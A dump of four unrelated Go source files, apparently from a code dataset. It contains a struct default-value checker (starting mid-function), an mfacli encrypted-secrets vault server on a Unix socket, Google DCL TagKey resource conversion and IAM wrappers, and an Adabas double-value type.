typeSpec, ok := spec.(*ast.TypeSpec) //nolint:varnamelen
if !ok {
continue
}
if typeSpec.Name.Name != typeName {
continue
}
structType, ok := typeSpec.Type.(*ast.StructType)
if !ok {
continue
}
return extractFields(typeSpec.TypeParams), extractFields(structType.Fields)
}
}
return nil, nil
}
func getDecls(packages map[string]*ast.Package) []ast.Decl {
var res []ast.Decl
for _, pkg := range packages {
for _, fileObj := range pkg.Files {
res = append(res, fileObj.Decls...)
}
}
return res
}
func extractFields(fl *ast.FieldList) []*ast.Field {
if fl == nil {
return nil
}
return fl.List
}
func isPublic(fieldName string) bool {
char, _ := utf8.DecodeRuneInString(fieldName)
return char != utf8.RuneError && unicode.IsUpper(char)
}
func checkDefaultValue(fieldType string, tag string) error {
var err error
switch fieldType {
case "int", "int8", "int16", "int32", "int64":
_, err = strconv.ParseInt(tag, 10, 64)
case "uint", "uint8", "uint16", "uint32", "uint64":
_, err = strconv.ParseUint(tag, 10, 64)
case "float32", "float64":
_, err = strconv.ParseFloat(tag, 64)
case "time.Duration":
_, err = time.ParseDuration(tag)
case "bool":
if !(tag == "true" || tag == "false") {
return fmt.Errorf("bool type only supports true/false")
}
case "string":
// As is.
default:
return fmt.Errorf("unsupported type `%s`", fieldType)
}
if err != nil {
return fmt.Errorf("bad default value %w %s", err, tag)
}
return nil
}
|
package vault
import (
"io/ioutil"
"net"
"net/rpc"
"os"
"os/signal"
"syscall"
"time"
log "github.com/sirupsen/logrus"
"github.com/nordcloud/mfacli/config"
"github.com/nordcloud/mfacli/pkg/codec"
)
const (
serverName = "VaultServer"
)
type VaultServer struct {
vault *localVault
lis net.Listener
}
func (s *VaultServer) GetSecrets(input struct{}, secrets *map[string]string) error {
*secrets = s.vault.secrets
return nil
}
func (s *VaultServer) StoreSecrets(secrets map[string]string, output *struct{}) error {
s.vault.secrets = secrets
return s.vault.save()
}
func (s *VaultServer) Stop(input struct{}, output *struct{}) error {
s.lis.Close()
return nil
}
func RunServer(cfg *config.Config) error {
key, err := ioutil.ReadAll(os.Stdin)
if err != nil {
return err
}
vault, err := openLocalWithKey(cfg.VaultPath, key)
if err != nil {
return err
}
lis, err := net.Listen("unix", cfg.SocketPath)
if err != nil {
return err
}
defer lis.Close()
go handleSignals(lis)
err = rpc.Register(&VaultServer{
lis: lis,
vault: vault,
})
if err != nil {
return err
}
go func() {
time.Sleep(8 * time.Hour)
log.Info("closing listener after timeout")
lis.Close()
}()
rpc.Accept(lis)
return nil
}
func openLocalWithKey(path string, key []byte) (*localVault, error) {
file, err := os.Open(path)
if err != nil {
return nil, err
}
data, err := ioutil.ReadAll(file)
if err != nil {
return nil, err
}
secrets, err := codec.Decrypt(data, key)
if err != nil {
return nil, err
}
return &localVault{
secrets: secrets,
encKey: key,
path: path,
}, nil
}
func handleSignals(lis net.Listener) {
c := make(chan os.Signal)
signal.Notify(c, os.Interrupt, syscall.SIGTERM)
s := <-c
log.Infof("Caught the %s signal, closing server", s.String())
lis.Close()
os.Exit(0)
}
|
// Copyright 2023 Google LLC. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package cloudresourcemanager
import (
"context"
"fmt"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/dcl"
dclService "github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/cloudresourcemanager"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/services/google/iam"
"github.com/GoogleCloudPlatform/declarative-resource-client-library/unstructured"
iamUnstruct "github.com/GoogleCloudPlatform/declarative-resource-client-library/unstructured/google/iam"
)
type TagKey struct{}
func TagKeyToUnstructured(r *dclService.TagKey) *unstructured.Resource {
u := &unstructured.Resource{
STV: unstructured.ServiceTypeVersion{
Service: "cloudresourcemanager",
Version: "ga",
Type: "TagKey",
},
Object: make(map[string]interface{}),
}
if r.CreateTime != nil {
u.Object["createTime"] = *r.CreateTime
}
if r.Description != nil {
u.Object["description"] = *r.Description
}
if r.Etag != nil {
u.Object["etag"] = *r.Etag
}
if r.Name != nil {
u.Object["name"] = *r.Name
}
if r.NamespacedName != nil {
u.Object["namespacedName"] = *r.NamespacedName
}
if r.Parent != nil {
u.Object["parent"] = *r.Parent
}
if r.Purpose != nil {
u.Object["purpose"] = string(*r.Purpose)
}
if r.PurposeData != nil {
rPurposeData := make(map[string]interface{})
for k, v := range r.PurposeData {
rPurposeData[k] = v
}
u.Object["purposeData"] = rPurposeData
}
if r.ShortName != nil {
u.Object["shortName"] = *r.ShortName
}
if r.UpdateTime != nil {
u.Object["updateTime"] = *r.UpdateTime
}
return u
}
func UnstructuredToTagKey(u *unstructured.Resource) (*dclService.TagKey, error) {
r := &dclService.TagKey{}
if _, ok := u.Object["createTime"]; ok {
if s, ok := u.Object["createTime"].(string); ok {
r.CreateTime = dcl.String(s)
} else {
return nil, fmt.Errorf("r.CreateTime: expected string")
}
}
if _, ok := u.Object["description"]; ok {
if s, ok := u.Object["description"].(string); ok {
r.Description = dcl.String(s)
} else {
return nil, fmt.Errorf("r.Description: expected string")
}
}
if _, ok := u.Object["etag"]; ok {
if s, ok := u.Object["etag"].(string); ok {
r.Etag = dcl.String(s)
} else {
return nil, fmt.Errorf("r.Etag: expected string")
}
}
if _, ok := u.Object["name"]; ok {
if s, ok := u.Object["name"].(string); ok {
r.Name = dcl.String(s)
} else {
return nil, fmt.Errorf("r.Name: expected string")
}
}
if _, ok := u.Object["namespacedName"]; ok {
if s, ok := u.Object["namespacedName"].(string); ok {
r.NamespacedName = dcl.String(s)
} else {
return nil, fmt.Errorf("r.NamespacedName: expected string")
}
}
if _, ok := u.Object["parent"]; ok {
if s, ok := u.Object["parent"].(string); ok {
r.Parent = dcl.String(s)
} else {
return nil, fmt.Errorf("r.Parent: expected string")
}
}
if _, ok := u.Object["purpose"]; ok {
if s, ok := u.Object["purpose"].(string); ok {
r.Purpose = dclService.TagKeyPurposeEnumRef(s)
} else {
return nil, fmt.Errorf("r.Purpose: expected string")
}
}
if _, ok := u.Object["purposeData"]; ok {
if rPurposeData, ok := u.Object["purposeData"].(map[string]interface{}); ok {
m := make(map[string]string)
for k, v := range rPurposeData {
if s, ok := v.(string); ok {
m[k] = s
}
}
r.PurposeData = m
} else {
return nil, fmt.Errorf("r.PurposeData: expected map[string]interface{}")
}
}
if _, ok := u.Object["shortName"]; ok {
if s, ok := u.Object["shortName"].(string); ok {
r.ShortName = dcl.String(s)
} else {
return nil, fmt.Errorf("r.ShortName: expected string")
}
}
if _, ok := u.Object["updateTime"]; ok {
if s, ok := u.Object["updateTime"].(string); ok {
r.UpdateTime = dcl.String(s)
} else {
return nil, fmt.Errorf("r.UpdateTime: expected string")
}
}
return r, nil
}
func GetTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource) (*unstructured.Resource, error) {
c := dclService.NewClient(config)
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
r, err = c.GetTagKey(ctx, r)
if err != nil {
return nil, err
}
return TagKeyToUnstructured(r), nil
}
func ApplyTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, opts ...dcl.ApplyOption) (*unstructured.Resource, error) {
c := dclService.NewClient(config)
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
if ush := unstructured.FetchStateHint(opts); ush != nil {
sh, err := UnstructuredToTagKey(ush)
if err != nil {
return nil, err
}
opts = append(opts, dcl.WithStateHint(sh))
}
r, err = c.ApplyTagKey(ctx, r, opts...)
if err != nil {
return nil, err
}
return TagKeyToUnstructured(r), nil
}
func TagKeyHasDiff(ctx context.Context, config *dcl.Config, u *unstructured.Resource, opts ...dcl.ApplyOption) (bool, error) {
c := dclService.NewClient(config)
r, err := UnstructuredToTagKey(u)
if err != nil {
return false, err
}
if ush := unstructured.FetchStateHint(opts); ush != nil {
sh, err := UnstructuredToTagKey(ush)
if err != nil {
return false, err
}
opts = append(opts, dcl.WithStateHint(sh))
}
opts = append(opts, dcl.WithLifecycleParam(dcl.BlockDestruction), dcl.WithLifecycleParam(dcl.BlockCreation), dcl.WithLifecycleParam(dcl.BlockModification))
_, err = c.ApplyTagKey(ctx, r, opts...)
if err != nil {
if _, ok := err.(dcl.ApplyInfeasibleError); ok {
return true, nil
}
return false, err
}
return false, nil
}
func DeleteTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource) error {
c := dclService.NewClient(config)
r, err := UnstructuredToTagKey(u)
if err != nil {
return err
}
return c.DeleteTagKey(ctx, r)
}
func TagKeyID(u *unstructured.Resource) (string, error) {
r, err := UnstructuredToTagKey(u)
if err != nil {
return "", err
}
return r.ID()
}
func (r *TagKey) STV() unstructured.ServiceTypeVersion {
return unstructured.ServiceTypeVersion{
"cloudresourcemanager",
"TagKey",
"ga",
}
}
func SetPolicyTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, p *unstructured.Resource) (*unstructured.Resource, error) {
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
policy, err := iamUnstruct.UnstructuredToPolicy(p)
if err != nil {
return nil, err
}
policy.Resource = r
iamClient := iam.NewClient(config)
newPolicy, err := iamClient.SetPolicy(ctx, policy)
if err != nil {
return nil, err
}
return iamUnstruct.PolicyToUnstructured(newPolicy), nil
}
func SetPolicyWithEtagTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, p *unstructured.Resource) (*unstructured.Resource, error) {
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
policy, err := iamUnstruct.UnstructuredToPolicy(p)
if err != nil {
return nil, err
}
policy.Resource = r
iamClient := iam.NewClient(config)
newPolicy, err := iamClient.SetPolicyWithEtag(ctx, policy)
if err != nil {
return nil, err
}
return iamUnstruct.PolicyToUnstructured(newPolicy), nil
}
func GetPolicyTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource) (*unstructured.Resource, error) {
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
iamClient := iam.NewClient(config)
policy, err := iamClient.GetPolicy(ctx, r)
if err != nil {
return nil, err
}
return iamUnstruct.PolicyToUnstructured(policy), nil
}
func SetPolicyMemberTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, m *unstructured.Resource) (*unstructured.Resource, error) {
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
member, err := iamUnstruct.UnstructuredToMember(m)
if err != nil {
return nil, err
}
member.Resource = r
iamClient := iam.NewClient(config)
policy, err := iamClient.SetMember(ctx, member)
if err != nil {
return nil, err
}
return iamUnstruct.PolicyToUnstructured(policy), nil
}
func GetPolicyMemberTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, role, member string) (*unstructured.Resource, error) {
r, err := UnstructuredToTagKey(u)
if err != nil {
return nil, err
}
iamClient := iam.NewClient(config)
policyMember, err := iamClient.GetMember(ctx, r, role, member)
if err != nil {
return nil, err
}
return iamUnstruct.MemberToUnstructured(policyMember), nil
}
func DeletePolicyMemberTagKey(ctx context.Context, config *dcl.Config, u *unstructured.Resource, m *unstructured.Resource) error {
r, err := UnstructuredToTagKey(u)
if err != nil {
return err
}
member, err := iamUnstruct.UnstructuredToMember(m)
if err != nil {
return err
}
member.Resource = r
iamClient := iam.NewClient(config)
if err := iamClient.DeleteMember(ctx, member); err != nil {
return err
}
return nil
}
func (r *TagKey) SetPolicyMember(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, member *unstructured.Resource) (*unstructured.Resource, error) {
return SetPolicyMemberTagKey(ctx, config, resource, member)
}
func (r *TagKey) GetPolicyMember(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, role, member string) (*unstructured.Resource, error) {
return GetPolicyMemberTagKey(ctx, config, resource, role, member)
}
func (r *TagKey) DeletePolicyMember(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, member *unstructured.Resource) error {
return DeletePolicyMemberTagKey(ctx, config, resource, member)
}
func (r *TagKey) SetPolicy(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, policy *unstructured.Resource) (*unstructured.Resource, error) {
return SetPolicyTagKey(ctx, config, resource, policy)
}
func (r *TagKey) SetPolicyWithEtag(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, policy *unstructured.Resource) (*unstructured.Resource, error) {
return SetPolicyWithEtagTagKey(ctx, config, resource, policy)
}
func (r *TagKey) GetPolicy(ctx context.Context, config *dcl.Config, resource *unstructured.Resource) (*unstructured.Resource, error) {
return GetPolicyTagKey(ctx, config, resource)
}
func (r *TagKey) Get(ctx context.Context, config *dcl.Config, resource *unstructured.Resource) (*unstructured.Resource, error) {
return GetTagKey(ctx, config, resource)
}
func (r *TagKey) Apply(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, opts ...dcl.ApplyOption) (*unstructured.Resource, error) {
return ApplyTagKey(ctx, config, resource, opts...)
}
func (r *TagKey) HasDiff(ctx context.Context, config *dcl.Config, resource *unstructured.Resource, opts ...dcl.ApplyOption) (bool, error) {
return TagKeyHasDiff(ctx, config, resource, opts...)
}
func (r *TagKey) Delete(ctx context.Context, config *dcl.Config, resource *unstructured.Resource) error {
return DeleteTagKey(ctx, config, resource)
}
func (r *TagKey) ID(resource *unstructured.Resource) (string, error) {
return TagKeyID(resource)
}
func init() {
unstructured.Register(&TagKey{})
}
|
/*
* Copyright © 2018-2022 Software AG, Darmstadt, Germany and/or its licensors
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package adatypes
import (
"bytes"
"encoding/binary"
"fmt"
"math"
"reflect"
"strconv"
)
type doubleValue struct {
adaValue
value []byte
}
func newDoubleValue(initType IAdaType) *doubleValue {
value := doubleValue{adaValue: adaValue{adatype: initType}}
value.value = make([]byte, 8)
return &value
}
func float64ToByte(f float64) []byte {
buf := new(bytes.Buffer)
err := binary.Write(buf, endian(), f)
if err != nil {
fmt.Println("binary.Write failed:", err)
}
return buf.Bytes()
}
func byteToFLoat64(b []byte) float64 {
buf := bytes.NewBuffer(b)
var f float64
err := binary.Read(buf, endian(), &f)
if err != nil {
fmt.Println("binary.Read failed:", err)
}
return f
}
func (value *doubleValue) ByteValue() byte {
return value.value[0]
}
func (value *doubleValue) String() string {
return fmt.Sprintf("%f", byteToFLoat64(value.value))
}
func (value *doubleValue) Value() interface{} {
return byteToFLoat64(value.value)
}
func (value *doubleValue) Bytes() []byte {
return value.value
}
func (value *doubleValue) SetStringValue(stValue string) {
f, err := strconv.ParseFloat(stValue, 64)
if err == nil {
value.value = float64ToByte(f)
}
}
func (value *doubleValue) SetValue(v interface{}) error {
switch reflect.TypeOf(v).Kind() {
case reflect.Float32, reflect.Float64:
f := reflect.ValueOf(v).Float()
value.value = float64ToByte(f)
case reflect.String:
vs := reflect.ValueOf(v).String()
value.SetStringValue(vs)
case reflect.Slice:
bv := v.([]byte)
if uint32(len(bv)) > value.Type().Length() {
return NewGenericError(109)
}
copy(value.value[:len(bv)], bv[:])
default:
i, err := value.commonInt64Convert(v)
if err != nil {
return err
}
value.value = float64ToByte(float64(i))
return nil
}
return nil
}
func (value *doubleValue) FormatBuffer(buffer *bytes.Buffer, option *BufferOption) uint32 {
return value.commonFormatBuffer(buffer, option, value.Type().Length())
}
func (value *doubleValue) StoreBuffer(helper *BufferHelper, option *BufferOption) error {
// Skip normal fields in second call
if option != nil && option.SecondCall > 0 {
return nil
}
return helper.putBytes(value.value)
}
func (value *doubleValue) parseBuffer(helper *BufferHelper, option *BufferOption) (res TraverseResult, err error) {
value.value, err = helper.ReceiveBytes(value.Type().Length())
return
}
func (value *doubleValue) Int8() (int8, error) {
fl := byteToFLoat64(value.value)
if fl != math.Trunc(fl) {
return 0, NewGenericError(105, value.Type().Name(), "signed 32-bit integer")
}
return int8(fl), nil
}
func (value *doubleValue) UInt8() (uint8, error) {
return uint8(byteToFLoat64(value.value)), nil
}
func (value *doubleValue) Int16() (int16, error) {
fl := byteToFLoat64(value.value)
if fl != math.Trunc(fl) {
return 0, NewGenericError(105, value.Type().Name(), "signed 32-bit integer")
}
return int16(fl), nil
}
func (value *doubleValue) UInt16() (uint16, error) {
return uint16(byteToFLoat64(value.value)), nil
}
func (value *doubleValue) Int32() (int32, error) {
fl := byteToFLoat64(value.value)
if fl != math.Trunc(fl) {
return 0, NewGenericError(105, value.Type().Name(), "signed 32-bit integer")
}
return int32(fl), nil
}
func (value *doubleValue) UInt32() (uint32, error) {
return uint32(byteToFLoat64(value.value)), nil
}
func (value *doubleValue) Int64() (int64, error) {
return int64(byteToFLoat64(value.value)), nil
}
func (value *doubleValue) UInt64() (uint64, error) {
return uint64(byteToFLoat64(value.value)), nil
}
func (value *doubleValue) Float() (float64, error) {
return byteToFLoat64(value.value), nil
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.